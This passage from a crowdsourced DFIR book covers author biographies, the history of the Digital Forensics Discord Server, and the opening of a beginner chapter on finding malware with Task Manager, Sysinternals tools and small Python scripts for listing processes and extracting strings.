Linux as a digital forensics platform has been available for over 20 years and has been used by a number of academic institutions and law enforcement agencies around the world to introduce students of DFIR to Linux. Teaching, particularly Linux forensics and open source DFIR tools, is his passion. ¹https://www.linkedin.com/company/digital-forensics-discord-server/ ²https://aboutdfir.com/ ³https://github.com/stars/AndrewRathbun/lists/my-projects ⁴http://discordapp.com/users/223211621185617920 ⁵https://linuxleo.com
  • 9. Authors 2 Guus Beckers A lifelong IT aficionado, Guus Beckers (1990), completed the Network Forensic Research track at Zuyd University of Applied Sciences as part of his Bachelor’s degree. In 2016, he attained his university Master’s degree at Maastricht University by completing the Forensics, Criminology and Law master’s program. Guus currently works as a security consultant at Secura, leading the forensic team and performing penetration testing. Jason Wilkins After serving in the US Navy for five years, Jason Wilkins began a career in firefighting and emergency medicine. While serving the community in that capacity for fourteen years he obtained associates degrees in criminal justice and computer networking from Iowa Central Community College online. He left the fire department in 2014 to pursue a network analyst position working for a global tire manufacturer. Disillusioned by a lack of mission and purpose, he returned to public safety in 2019 and began working as a crime & intelligence analyst for the local police department. It was there that he developed the agency’s first digital forensics lab and started the N00B2PR04N6 blog. In 2020 he was nominated as Newcomer of the Year in the Digital Forensics 4:Cast awards and has spoken at both the SANS Digital Forensics and Magnet Forensics Summits. He currently works as an overseas contractor teaching digital forensics and is also an adjunct instructor for digital forensics and incident response at Iowa Central Community College. John Haynes John Haynes works in law enforcement with a focus on digital forensics. John holds several digital forensics certs including Cellebrite Certified Mobile Examiner (CCME) and Magnet Certified Forensics Examiner (MCFE) and also holds the networking Cisco Certified Network Associate (CCNA) certification. Having only been active in digital forensics since 2020, his background as a curious nerd has served him well as he has just started exploring what digital forensics has to offer. John has taken a keen interest in password cracking after being introduced to the basics of Hashcat at the NCFI. This started the foundation for the password-cracking chapter in this book. You can find a few of his videos on password cracking on YouTube⁶ or find him learning what he can on the DFIR Discord⁷. Kevin Pagano Kevin Pagano is a digital forensics analyst, researcher, blogger and contributor to the open-source community. He holds a Bachelor of Science in Computer Forensics from Bloomsburg University ⁶https://www.youtube.com/channel/UCJVXolxwB4x3EsBAzSACCTg ⁷http://discordapp.com/users/167135713006059520
He holds a Bachelor of Science in Computer Forensics from Bloomsburg University of Pennsylvania and a Graduate Certificate in Digital Forensics from Champlain College. Kevin is a member of the GIAC Advisory Board and holds several industry certifications, including the GIAC Advanced Smartphone Forensics (GASF), GIAC Certified Forensic Examiner (GCFE), GIAC Battlefield Forensics and Acquisition (GBFA), and the Cellebrite Certified Mobile Examiner (CCME), among others.

Kevin is the creator of the Forensics StartMe⁸ page and regularly shares his research on his blog⁹. He is a published author with multiple peer-reviewed papers accepted through DFIR Review¹⁰. Kevin also contributes to multiple open-source projects, including but not limited to ALEAPP¹¹, iLEAPP¹², RLEAPP¹³, CLEAPP¹⁴ and KAPE¹⁵.

Kevin is a regular competitor in the digital forensics CTF circuit. He has won First Place in the Magnet User Summit DFIR CTF 2019, the Magnet Virtual Summit DFIR CTF 2021, the Magnet User Summit DFIR CTF 2022, the Magnet Weekly CTF 2020, the Wi-Fighter Challenge v3 CTF, the Belkasoft Europe 2021 CTF, and the BloomCON CTF in 2017, 2019, 2021 and 2022. He is additionally a SANS DFIR NetWars Champion and NetWars Tournament of Champions winner and has earned multiple Lethal Forensicator coins. Kevin is a 4-time Hacking Exposed Computer Forensics (HECF) Blog Sunday Funday Winner.

In his spare time, Kevin likes to drink beers and create DFIR-themed designs for stickers, clothing, and other swag. You can find him lurking on Twitter¹⁶ and on the DFIR Discord¹⁷.

Nisarg Suthar

Nisarg Suthar is a lifelong student and learner of DFIR. He is an aspiring digital forensic analyst with high levels of curiosity about how things work the way that they do. He has experience with malware analysis, reverse engineering, and forensics. Nisarg is an independent researcher, a blue teamer, a CTF player, and a blogger¹⁸. He likes to read DFIR material old and new, complete investigations on platforms like CyberDefenders and BTLO, and network with other forensicators to learn and grow mutually.

He is also the developer of his most recent open-source project Veritas¹⁹, a validation-purpose hex viewer for the people in DFIR. He is a big fan of all things FOSS. Nisarg started tinkering with the disassembly of machine code, computer data, and reverse engineering when he came across the world of modding, emulation, and ROM hacking. Making his favorite games do what he wanted was a full-time hobby of writing code and stories.

⁸https://start.me/p/q6mw4Q/forensics
⁹https://www.stark4n6.com/
¹⁰https://dfir.pubpub.org/user/kevin-pagano
¹¹https://github.com/abrignoni/ALEAPP
¹²https://github.com/abrignoni/iLEAPP
¹³https://github.com/abrignoni/RLEAPP
¹⁴https://github.com/markmckinnon/cLeapp
¹⁵https://www.kroll.com/en/insights/publications/cyber/kroll-artifact-parser-extractor-kape
¹⁶https://twitter.com/kevinpagano3
¹⁷http://discordapp.com/users/597827073846935564
¹⁸https://sutharnisarg.medium.com/
¹⁹https://github.com/Nisarg12/Veritas
In his spare time, Nisarg likes to play and learn chess obsessively.

s3raph

Breaker of things (mostly things that shouldn't be broken). Writer of broken code (GitHub²⁰). s3raph has worked in DFIR, Threat Hunting, Penetration Testing, and Cyber Defense and still somehow has a job in this field. Do You Want to Know More?²¹

Tristram

An avid blue team leader helping to secure the healthcare industry. Despite being blue-team focused, Tristram brings the enemy mindset to the table through various offensive skillsets to identify gaps and validate existing controls.

²⁰https://github.com/s3raph-x00
²¹https://www.s3raph.com/
Contributors

Thank You,

• Holly Kennedy²² | Twitter²³ - For proofreading, editing, and making corrections!
• Oaker Min²⁴ | Blog²⁵ | Twitter²⁶ - For helping with the dead link checker²⁷!
• Klavdii²⁸ - For providing multiple²⁹ grammatical, spelling, and punctuation fixes as they were reading the book.
• …and all other contributors³⁰ to the GitHub repository!

Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the authors nor contributors will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.

²²https://github.com/hollykennedy
²³https://twitter.com/hollykennedy4n6
²⁴https://github.com/brootware
²⁵https://brootware.github.io/
²⁶https://twitter.com/brootware/
²⁷https://github.com/Digital-Forensics-Discord-Server/CrowdsourcedDFIRBook/issues/59
²⁸https://github.com/lordicode
²⁹https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/pulls?q=is%3Apr+author%3Alordicode+is%3Aclosed
³⁰https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/graphs/contributors
Chapter 0 - Introduction

By Andrew Rathbun³¹ | Twitter³² | Discord³³

Welcome to the first crowdsourced digital forensics and incident response (DFIR) book! To my knowledge, this book is a first of its kind and hopefully not the last of its kind. To be very clear, this is not your traditional DFIR book. It's also not meant to be, and that's okay.

I came up with the idea of the project which ultimately became the book you are reading right now when I stumbled upon a website called Leanpub. Upon further research, I learned that books could be written on GitHub, a platform that has become a large part of my life since May 15, 2020, when I completed my first commit³⁴! As the Administrator of the Digital Forensics Discord Server, a community of which I am very fond and proud, I felt that combining the idea of writing a book with the members of the community that has given so much to me was a dream come true.

This book is a grassroots effort from people who, to my knowledge, have no experience doing anything they're about to do in the chapters that follow this introduction, and that's okay. This book isn't perfect, and it doesn't need to be. This book documents multiple people stepping outside of their shells and putting themselves out there to share the knowledge they've gained through the lens they've been granted in their lives, with hopes of benefiting the greater DFIR community. Additionally, I hope this book will inspire others to step outside their comfort zone and recognize that anyone can share knowledge, thus leaving the world a better place than they found it.

Before getting into the chapters this book offers, I want to cover the mantra behind this book for the reader to consider as they make their way through.

³¹https://github.com/AndrewRathbun
³²https://twitter.com/bunsofwrath12
³³http://discordapp.com/users/223211621185617920
³⁴https://github.com/EricZimmerman/KapeFiles/commit/972774117b42e6fafbd06fd9b80d29e9f1ca629a
Purpose of This Book

This book is purely a proof of concept that members of the Digital Forensics Discord Server undertook to show that a DFIR book can be:

Crowdsourced

I love collaborating with people. I enjoy it when I can find people with the same mindset who "get it" and all they want to do is move the ball forward on something greater than themselves. Everyone contributing to this book "gets it", but that doesn't mean if you're reading this right now and haven't contributed to it, you do not "get it". I think it means you haven't found something that's resonated with you yet, or you're just not at a point in your career or, more importantly, your life where you're able to give back through the various methods of giving back to the DFIR community, and that's okay. Ultimately, this book is greater than the sum of its parts, and I'm thrilled to help provide the opportunity for myself and others to collaborate with other members of the Digital Forensics Discord Server to create something genuinely community-driven from idea to published book.

Open source

Since my first commit on GitHub in May 2020, I've been hooked on contributing to open-source projects. The ability for the community to see the process unfold from A-Z, including but not limited to the chapters being written, edited, and finalized for publication, is something I don't think we've seen yet, and I hope we see more of once this book is published and freely available for anyone to consume.

Self-published

Self-publishing allows for as much control as possible for the content creators. Being able to self-publish on Leanpub enables the content creators to modify the content at a moment's notice without the red tape involved when dealing with a publisher. As a result, this book can be updated at any time with additional content until the authors deem the book to be complete, and thus a sequel would be necessary.
Created using GitHub and Markua (modified version of Markdown)

This goes hand in hand with the open-source point above. GitHub is a fantastic platform by which to contribute to open source projects. Markdown is commonly used on GitHub, and Leanpub utilizes a Leanpub-flavored version of Markdown called Markua³⁵. Having gained a lot of experience with Markdown in my travels in various GitHub repos, the thought of authoring a book using Markdown was very appealing.

Accessible

This particular book will be freely available on Leanpub here³⁶. It will never cost you anything. Share it far and wide!

Considering all the above, a legitimate DFIR resource

Frankly, this may not be at the level of a college textbook, but it's also not meant to be. Again, this project is intended to provide a platform for previously unknown contributors in the DFIR community to share the knowledge they've gained through research, experience, or otherwise. When someone is passionate enough about a subject to volunteer to write a chapter for a book like this, enabling that person to spread their wings and put themselves out there for others to benefit from is an honor. Any errata in the chapters of this book will be addressed as they are identified, and since we control the publishing tempo, we (or you) can update the book at any time.

³⁵http://markua.com/
³⁶https://leanpub.com/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts
Community Participation

One important aspect of creating this book was involving the community in deciding the book title³⁷ and the book cover³⁸.

Book Title

Originally, this book was called CrowdsourcedDFIRBook as a working title. Multiple polls on Google Forms³⁹ were created, with the following results:

Round 1

³⁷https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/issues/4
³⁸https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/issues/12
³⁹https://www.google.com/forms
Round 2

Book Cover

Originally, the book had no cover concept planned. As we got closer to the date of publishing the initial version of the book, we discovered that Canva⁴⁰ allowed us to work up respectable book cover candidates. Naturally, the book cover was put to a vote that would be decided by the community. The first voting round contained 17 book cover candidates created using Canva.

Round 1

The following book covers were available as options during the first round of voting:

⁴⁰https://www.canva.com/
The final results for Round 1 were as follows:
Round 2

The following book covers were voted the top three in Round 1:

The final results for Round 2 were as follows:

Therefore, the book cover was chosen by the community for a book that was made by the community and for the community.
Final Thoughts

I don't think any of the co-authors listed on the cover of this book ever thought they would be published authors. I can certainly say that is the case for myself. This project proved that the barrier to doing something as complicated as writing a book isn't as high as it may seem, primarily thanks to Leanpub. For all we know, the next prominent name in the DFIR world may have gotten their start from volunteering a simple chapter to this book, which sparked an interest in continuing the path of knowledge sharing, content development, and overall DFIR community betterment. Only time will tell!

Either way, I'm proud of those who stepped up to do something uncomfortable, something that requires effort and follow-through, and something they can ultimately be proud of accomplishing when all is said and done. Ultimately, the authors win, the other contributors win, and most importantly, the community wins!

Enjoy the book!
Chapter 1 - History of the Digital Forensics Discord Server

By Andrew Rathbun⁴¹ | Twitter⁴² | Discord⁴³

Special thanks to Kevin Pagano for creating the Digital Forensics Discord Server logo!

Introduction

I felt it was prudent to choose this topic for this project because very few others could provide as in-depth an account of the history of the Digital Forensics Discord Server. Having been a part of the server since day one and actively monitoring it every day since, I felt like this was something that needed to be immortalized before too much more time passes. As the server continues to grow and life forges on, much like a DVR or event log, memories are overwritten with more current memories. I very likely would not be able to write as detailed an account of this server's history 5 years from now as I can today. If anything, documenting this history now creates a starting point to build upon over time.

⁴¹https://github.com/AndrewRathbun
⁴²https://twitter.com/bunsofwrath12
⁴³http://discordapp.com/users/223211621185617920
Beginnings in IRC

Long before the Digital Forensics Discord Server came to be, there existed a channel on an IRC⁴⁴ network called freenode⁴⁵. The channel was called #mobileforensics. This channel had its humble beginnings on a Google Group run by Bob Elder of TeelTech⁴⁶, called the Physical and RAW Mobile Forensics Group⁴⁷, which still exists today. To gain access to this Google Group, one had to have attended a TeelTech training in the past. It was and continues to be a phenomenal resource for those in Law Enforcement trying to navigate the waters of mobile forensic acquisitions.

In February 2016, I attended TeelTech's JTAG/Chip-Off class taught by Mike Boettcher and gained an invite to the Physical and RAW Mobile Forensics Group. I actively participated in the group to the extent my knowledge and curiosity enabled me. Make no mistake, almost every other active poster in that group was more experienced or knowledgeable than I was. I thought there was no better place or group of people to immerse myself in if I wanted to be the best version of myself.

On August 23, 2016, a user by the name of tupperwarez informed the group that they were starting an IRC channel called #mobileforensics in an effort to "exchange ideas & have live discussions". I had been using forums for all of my internet life up until that point, and I think subconsciously I was ready for something more. This was it! I also knew that IRC was a longstanding tradition, but I had never dabbled with it and had only used messaging clients such as AOL Instant Messenger (AIM)⁴⁸ and MSN Messenger⁴⁹ at the time. Thirteen minutes after the post by tupperwarez went out, I was the first to respond to the thread, confirming that I had joined.

⁴⁴https://en.wikipedia.org/wiki/Internet_Relay_Chat
⁴⁵https://en.wikipedia.org/wiki/Freenode
⁴⁶https://www.teeltech.com/
⁴⁷https://groups.google.com/g/physical-mobile-forensics/about?pli=1
⁴⁸https://en.wikipedia.org/wiki/AIM_(software)
⁴⁹https://en.wikipedia.org/wiki/Windows_Live_Messenger
Throughout the next year and a half, a small contingent of 7-15 people occupied this IRC channel at any given time. We became a tight-knit group of examiners who relied on each other's knowledge and expertise to navigate challenges in our everyday casework. These problems often related to performing advanced acquisition methods using Chip-Off, JTAG, or flasher boxes. The collaboration was exactly what I was looking for, because together we were able to cast a wider net when searching for the knowledge we needed to solve the problems we faced in our everyday investigations.

I recall utilizing an application called HexChat⁵⁰ to access this IRC channel. I'd have HexChat open at all times along with my everyday workflow of software applications to perform my duties as a Detective. For those reading this who have not used IRC before, know that it's nowhere near as feature-rich as Discord. Discord is much more modern, while IRC has been around since the early days of the internet as we know it today. I bring this up because we often needed to share pictures with each other as an exhibit for a problem we were encountering during the acquisition or decoding process of a mobile device.

⁵⁰https://hexchat.github.io/
Move to Discord

Truthfully, I had forgotten this detail I'm about to share, but a reminder from one of our moderators brought it all back to me. One of the main catalysts for moving from IRC was the fact that I was really annoyed with having to upload a picture to Imgur and share the link in the IRC channel. It seemed so inefficient, and the process grew stale for me. I had created a Discord account back in September 2016 to join various special interest servers, so I had a fair amount of exposure to Discord's capabilities prior to the birth of the Digital Forensics Discord Server on March 26th, 2018. I recall having aspirations for a move to Discord months prior to March 2018.

For those who didn't use Discord around this time, it was primarily a platform marketed towards gamers. Using it for things other than gaming wasn't the intended purpose at the time, but the functionality it had was everything I wanted in a chat client. Take all of the good features from every other chat application I had used up until that point in time, add even more quality-of-life features and an awesome mobile application, and I was sold. Discord was a breath of fresh air. My call to move to Discord was met with nearly unanimous approval from members of the IRC channel. As a result, the Mobile Forensics Discord Server was created!

Mobile Forensics Discord Server ⇒ Digital Forensics Discord Server

The Mobile Forensics Discord Server enjoyed great success and rapid growth throughout its first year of existence. The server's growth was entirely driven by word of mouth and advertising on various Google Groups. The list of channels maintained in the server was driven by member requests, which quickly expanded beyond mobile devices. Over time, it became increasingly apparent that branding the server as a Mobile Forensics server did not fully encompass the needs of the DFIR community. To the best of my research, the Mobile Forensics Discord Server was rebranded as the Digital Forensics Discord Server sometime around February 2019. Since then, multiple channels have been added, renamed, and removed at the request of members.
Member Growth

Throughout its first 4 years (as of this writing), the Digital Forensics Discord Server has undergone substantial growth. Below are some major membership milestones mined from my messages in the #announcements channel over time.

Major Milestones

Date         Member Count
3/26/2018    3
3/29/2018    116
4/3/2018     142
4/6/2018     171
4/11/2018    200
4/13/2018    250
5/30/2018    300
6/28/2018    375
7/9/2018     400
7/25/2018    450
8/20/2018    500
9/27/2018    600
11/16/2018   700
12/6/2018    800
1/10/2019    900
2/1/2019     1000
5/8/2019     1500
10/4/2019    2000
1/30/2020    2500
3/27/2020    3000
5/22/2020    4000
3/26/2021    6800
8/2/2021     8000
1/29/2022    9000
3/26/2022    9500
6/29/2022    10000
Hosting the 2020 Magnet Virtual Summit

In early 2020, shortly after the COVID-19 pandemic began, I was approached by representatives from Magnet Forensics inquiring about the possibility of providing a centralized location for attendees of the Magnet Virtual Summit 2020 to chat during presentations. Enthusiastically, we accepted the idea and began to plan the logistics of hosting what would likely become a large influx of members. I seem to recall nearly 1500 members joining during the month-long Magnet Virtual Summit 2020. In retrospect, it's clear that this was one of the first indicators that the server had "made it" in the eyes of the community.

Not only was the 2020 Magnet Virtual Summit a massive success in many ways, but I also strongly feel its success influenced other conferences and entities to go virtual as well as to adopt Discord as the means of communication for attendees. For instance, the SANS 2020 DFIR Summit hosted a Discord server for its attendees a couple of months after the 2020 Magnet Virtual Summit was hosted on the Digital Forensics Discord Server. I would like to think of the 2020 Magnet Virtual Summit as a proof of concept for collaboration and communication among conference staff, presenters, and attendees that succeeded beyond our expectations and influenced how conferences were virtualized in 2020 and beyond.

Community Engagement Within the Server

One of the biggest divides that the Digital Forensics Discord Server was able to bridge was that between customers and vendors. I recall spending a lot of time emailing every vendor I knew of, asking them to provide representation in the server, because of the untapped potential in customer and vendor communications that simply didn't exist at the time. Four years into the life of the server, representatives from multiple digital forensic software vendors are mainstays in their products' channels, providing an unprecedented amount of instant feedback between the customer and the vendor. Historically, support was provided by email via a ticketing system, a vendor's forum, or another means that lacked the instant feedback mechanism that Discord provides.

Not only are customers able to interact directly with digital forensic software vendor employees who can provide meaningful answers to help move a case forward, but the vendors can also receive product feedback and observe interactions between examiners (their customers) to better understand how they can serve those using their products. I have no possible way to quantify this statement, but I would like to think there has been a net positive influence on commonly utilized digital forensic software as a result of this direct interaction with the customer base within the Digital Forensics Discord Server's channels.
Impact on the DFIR community

In this section, I want to share some unique stories from people who have joined the Digital Forensics Discord Server and what impact it has had on them.

One of the earliest stories I can remember is from someone who identified themselves as a detective in Alaska. Specifically, this person stated they were a one-man digital forensics team at a police department in a remote part of Alaska. They did not have another tech-savvy person to run ideas past who was fewer than 3 hours away by car. Upon joining the Digital Forensics Discord Server, they said that the community provided exactly what they needed. Prior to joining the server, they were operating solo with no one to bounce ideas off when challenges arose in their investigations. When I was a detective, I always had at least 2 other people in my office to run ideas past or ensure I wasn't forgetting something simple when I ran into roadblocks in my analyses. I can only imagine the feeling of isolation with my closest support being over 3 hours away. The Digital Forensics Discord Server was a game changer because it provided something this person desperately needed: support!

More recently, someone joined the server from a country for which I had never expected to have to assign a Law Enforcement role. Someone posted in the #role-assignment channel stating they were a police officer in Iraq. In a prior life, I was in the United States Marine Corps. I had actually served a combat tour in Iraq in the infantry back in 2006-2007. Never in a million years would I have imagined that someone from Iraq serving in Law Enforcement would join the Digital Forensics Discord Server. To this day, this person is the only one occupying the Law Enforcement [Iraq] role, but when they joined the server, I felt I had come full circle. I engaged in conversation with this individual and asked for updates on how the country was doing. It really warmed my heart, in all honesty. I met so many wonderful people in that country during my 7-month deployment. To think that the country is in a place to join the 73 other countries that have roles within the server put a smile on my face and still does to this day.
Law Enforcement Personnel

Being former Law Enforcement myself, I understand the importance of jurisdiction and how laws can differ from one jurisdiction to another. As a result, Law Enforcement roles were separated by country from the early stages of the server for the purpose of delineating members from each other due to various legal considerations that may vary from one jurisdiction to another. Because of that, enumerating the countries for which a Law Enforcement role has been created is likely the best way to establish the reach the Digital Forensics Discord Server has in the global DFIR community.

Countries with roles assigned for Law Enforcement personnel, as of November 2022: Albania, Argentina, Australia, Austria, Bangladesh, Belgium, Bosnia, Brazil, Canada, Chile, China, Colombia, Croatia, Cyprus, Czech Republic, Denmark, Dominican Republic, Estonia, Finland, France, Germany, Greece, Grenada, Iceland, India, Iran, Iraq, Ireland, Israel, Italy, Jamaica, Japan, Korea, Latvia, Lithuania, Luxembourg, Malaysia, Maldives, Malta, Mauritius, Mexico, Monaco, Mongolia, Myanmar, Nepal, Netherlands, New Zealand, Nigeria, Norway, Pakistan, Peru, Philippines, Poland, Portugal, Romania, Royal Cayman Islands, Russia, Senegal, Seychelles, Singapore, Slovakia, Slovenia, Spain, Sweden, Switzerland, Taiwan, Turkey, Ukraine, United Arab Emirates, United Kingdom, Uruguay, USA, and Vietnam.

To save you from counting, that's 73 countries with a dedicated Law Enforcement role. This means at least one person who has identified themselves as working in Law Enforcement in each of these countries has joined the server and had this role assigned to them. With 195 countries⁵¹ recognized in the world as of the writing of this book, the server has a reach into approximately 37% of them!

⁵¹https://www.worldatlas.com/articles/how-many-countries-are-in-the-world.html
Forensic 4:cast Awards

The Digital Forensics Discord Server was fortunate enough to enjoy success in the Forensic 4:cast Awards⁵², as seen below:

Year   Category               Result
2020   Resource of the Year   Winner⁵³
2021   Resource of the Year   Winner⁵⁴
2022   Resource of the Year   Winner⁵⁵

Future

The Digital Forensics Discord Server will continue to live and thrive so long as the community wills it. I will always be active, but this server is and always has been far more than any single person. As long as the members of the DFIR community keep showing up and engaging with each other, the Digital Forensics Discord Server will never die…unless Discord ceases to exist, forcing the community to migrate to a different platform. Let's hope that doesn't happen anytime soon!

All indications are that the server will continue to grow through coworker word of mouth, exposure through training courses, and university programs sharing invites to the server with students. The server has always been welcoming to all, from the high school student wanting to work in DFIR someday, to people who've been involved in DFIR for decades, and everyone in between. This will not ever change.

Administrator Contingency Plan

This server has become such an important part of my life (and the DFIR community) that I've created a contingency plan. For those who are new to administering Discord servers, one important thing to know is that only the member who is assigned as the Server Owner can delete the server. Currently, that person is me, Andrew Rathbun. In the interest of ensuring the Digital Forensics Discord Server lives far beyond all of us (assuming Discord is still around by that time), I've established a paper trail for the other moderators to follow should anything happen to me that renders me unable to log back in to Discord. This paper trail will require a lot of effort and coordination with family members/friends of mine to access my password vault and many other necessary items in order to Transfer Ownership⁵⁶ so that the server can live on without any administrative hiccups. In the unfortunate event that I can no longer log back into Discord, a OneNote page has been shared with other moderators providing breadcrumbs to obtain the necessary information to transfer ownership to another moderator so the server can be properly taken care of.

⁵²https://forensic4cast.com/forensic-4cast-awards/
⁵³https://forensic4cast.com/forensic-4cast-awards/2020-forensic-4cast-awards/
⁵⁴https://forensic4cast.com/forensic-4cast-awards/2021-forensic-4cast-awards/
⁵⁵LinkTBD
⁵⁶https://support.discord.com/hc/en-us/articles/216273938-How-do-I-transfer-server-ownership
Conclusion

Thank you to everyone who has helped this server become such an integral part of the DFIR community.
Chapter 2 - Basic Malware Analysis

By ApexPredator⁵⁷ | Discord⁵⁸

Introduction

Malware has been around for as long as computers have been in common use. Any computer program that performs malicious activities is classified as malware. There are many types of malware, ranging from sophisticated self-propagating worms and destructive logic bombs to ransomware and harmless pranks. Everyone who regularly uses a computer will encounter malware at some point.

This chapter will cover the basics of analyzing malware on an infected computer. It is targeted towards hobbyists and beginners who are new to Digital Forensics and Incident Response (DFIR). The goal of this chapter is to teach someone unfamiliar with the basic concepts of malware analysis some Tactics, Techniques, and Procedures (TTPs) used to confirm that a computer is infected with malware, and to show how to begin extracting Indicators of Compromise (IOCs). It will cover the use of basic tools. It will not cover intermediate or advanced topics such as reverse engineering malware to discover its purpose or how it works.

The chapter starts with an introduction to basic malware analysis. It then covers some free tools to use in basic malware analysis. The chapter culminates with a walkthrough of a canned analysis of a piece of malware. The walkthrough wraps up with recommendations on where to go next to progress to intermediate or advanced malware analysis.

I had numerous instances of friends and family asking me to figure out why their computer was acting weird long before moving into cybersecurity and receiving formal training on malware analysis. I have had other cybersecurity professionals ask why it is not a waste of time to learn to build Microsoft Office macro-based payloads when Microsoft is making it harder for users to run the malicious code inside, to which I always respond, "Never underestimate the user's desire and ability to download and run anything sent to them." People are going to download and execute malware at some point, and if you are the IT expert, they will ask you to figure out what happened.

⁵⁷https://github.com/ApexPredator-InfoSec
⁵⁸http://discordapp.com/users/826227582202675210
One of my first instances of basic malware analysis occurred when I was in a situation that required using a computer shared by multiple people to access the internet. I erred on the paranoid side before using it to access any of my personal accounts and ran a network packet capture using Microsoft's NetMon, a packet capture tool similar to Wireshark. I noticed from the packet capture that the machine was communicating with a Chinese domain, which appeared unusual. I then conducted a quick Google search on the domain and found that it was associated with a piece of malware. The site I found listed additional IOCs, which enabled me to check running processes and find the malicious executable running. I was then able to kill the process with Task Manager. I was also able to review the registry with Regedit and delete the registry key that was created by the malware to establish persistence.

I then notified the other users of the machine that it had been running malware that steals information such as account credentials. The machine was reimaged to ensure all of the malware was removed and the machine was back to a known good state. Next, we will cover some of the basic tools that you can use to perform the same type of simple analysis.

Basic Malware Analysis Tools

This section covers free tools that can be used for basic malware analysis to identify if a machine has been infected with malware. You can use these tools to extract IOCs to share with the community or to include in an Incident Response report in a professional setting. We will start with built-in tools that you probably already know and discuss how to use them for basic malware analysis.

Task Manager is a built-in Windows tool that allows you to view running processes and how much of the system's resources they are using. On Windows 10, right-click the task bar and select Task Manager from the menu to launch the Task Manager. On Windows 11, click the Windows Start Menu icon and type Task Manager to search for the Task Manager app. You may then need to click the drop-down arrow labeled More details.
You can use this tool to find suspicious processes running on the machine. More sophisticated malware will attempt to blend in by using the names of common legitimate programs; however, if you have a specific process name from an IOC, you can easily look to see if it is running. Each process also has an arrow you can click to expand and show its child processes. There are also Startup and Services tabs that allow you to review processes that are set to run on startup and the list of installed services. You can review the Startup tab to help identify simple persistence mechanisms of malware by finding applications that run on startup that are uncommon or should not be included. The same approach works on the Services tab to find suspicious services installed on the machine. These tabs show you the same information that you would get by running Startup Apps or services.msc independently of Task Manager.
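The same IOC check can be scripted. Below is a minimal sketch, assuming the third-party psutil package (not part of the toolset above), that looks for a process name taken from an IOC:

```python
import psutil

# Hypothetical IOC: a process name we want to check for.
IOC_NAME = "python.exe"

# Walk all running processes and report any whose name matches the IOC.
for proc in psutil.process_iter(["pid", "name", "exe"]):
    if proc.info["name"] and proc.info["name"].lower() == IOC_NAME:
        print(f"Found {proc.info['name']} (PID {proc.info['pid']}) at {proc.info['exe']}")
```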
You can pull up the details for each service listed in the Services tab or from services.msc. The details list the Startup type, which is either Manual, Automatic, or Disabled. Services with the Automatic startup type start automatically when Windows boots. You can also find the path to the executable that the service runs and the user or context it runs under. These details are useful IOCs for malicious services installed by malware.
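As a rough sketch of how the same service details can be collected programmatically (again assuming the third-party psutil package, and Windows only):

```python
import psutil

# Enumerate installed Windows services with the same details visible in
# services.msc: name, startup type, account, and binary path.
for svc in psutil.win_service_iter():
    try:
        info = svc.as_dict()
        print(f"{info['name']}: start={info['start_type']}, "
              f"user={info['username']}, binpath={info['binpath']}")
    except psutil.Error:
        pass  # some services cannot be queried without elevation
```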
Process Explorer⁵⁹ (procexp.exe and procexp64.exe) from the Sysinternals Suite is another free tool that provides a greater level of detail than the built-in Task Manager in Windows. It provides the same functionality to kill processes while providing additional details in the main window. You can submit hashes to VirusTotal through Process Explorer to help determine if a process is malicious.

⁵⁹https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer
Right-clicking a process and selecting Check VirusTotal will prompt you to accept submitting hashes of the suspected process to VirusTotal. After selecting Yes on the prompt, the VirusTotal box on the Image tab will contain a link to the VirusTotal results for the submitted hash. In this case, the legitimate Microsoft Print Spooler executable spoolsv.exe was submitted, and 0 out of 73 Antivirus vendors detected it as malicious.

Process Explorer also has a TCP/IP tab listing listening addresses and ports as well as outbound communications made by the process. This helps a malware analyst determine if the process is listening on or communicating over any network ports. This can help find IOCs for Command and Control (C2) or even data exfiltration.
The Strings tab is another great feature that allows you to list the strings embedded in the binary, just like the strings command in Linux. This is useful for finding IOCs and determining some of the capabilities of the malware. You may be able to find IPs or domain names that are hard-coded into the application. Or you may find strings that point to dangerous Windows API calls that hint at the executable being malicious. The Sysinternals Suite can be downloaded here⁶⁰.

⁶⁰https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
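For files you cannot load into Process Explorer, the same idea is easy to approximate in a few lines of Python. This minimal sketch extracts printable ASCII runs of four or more characters; the length threshold is an arbitrary choice matching the default of the Linux strings command:

```python
import re
import sys

def extract_strings(path, min_len=4):
    """Return printable ASCII runs of at least min_len bytes, like `strings`."""
    with open(path, "rb") as f:
        data = f.read()
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [s.decode("ascii") for s in re.findall(pattern, data)]

if __name__ == "__main__":
    for s in extract_strings(sys.argv[1]):
        print(s)
```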
System Informer, formerly Process Hacker, is another great tool that performs similar functions to Task Manager and Process Explorer. It will provide you the same level of process detail and group the processes in a parent/child process layout like Process Explorer. Right-clicking a process in System Informer allows you to terminate it, just like in Task Manager and Process Explorer. Right-clicking and selecting Send to provides an option to send the process executable or DLL to VirusTotal, similar to Process Explorer. System Informer includes a Modules tab when right-clicking and selecting Properties on a process. This Modules tab lists all of the modules loaded and in use by the process. This is helpful for finding additional IOCs or identifying malicious DLL files used by a suspicious process.
System Informer provides Services and Network tabs that offer similar functionality to the features covered under Task Manager and Process Explorer. A malware analyst can use the Services tab to search for suspicious services and review the details of each service. The Network tab can be used to map running processes to active network connections and listening ports. System Informer is available for download at https://github.com/winsiderss/systeminformer.
Process Monitor⁶¹, or Procmon, is another tool included in the Sysinternals Suite that is useful for monitoring processes. Procmon goes beyond the process information provided by Task Manager, Process Explorer, or System Informer. It details every action taken by a process, allowing in-depth analysis of suspicious or malicious processes. Procmon will quickly overload an analyst with data unless filters are used to filter out the noise. It enables an analyst to find IOCs and understand what actions the malware has taken on the system.

⁶¹https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
ProcDOT is useful for filtering and displaying the results from Procmon. ProcDOT allows an analyst to ingest the logs generated from a Procmon capture saved in a CSV file. The analyst can then select the desired process from the imported CSV file, and ProcDOT will generate an interactive graph.
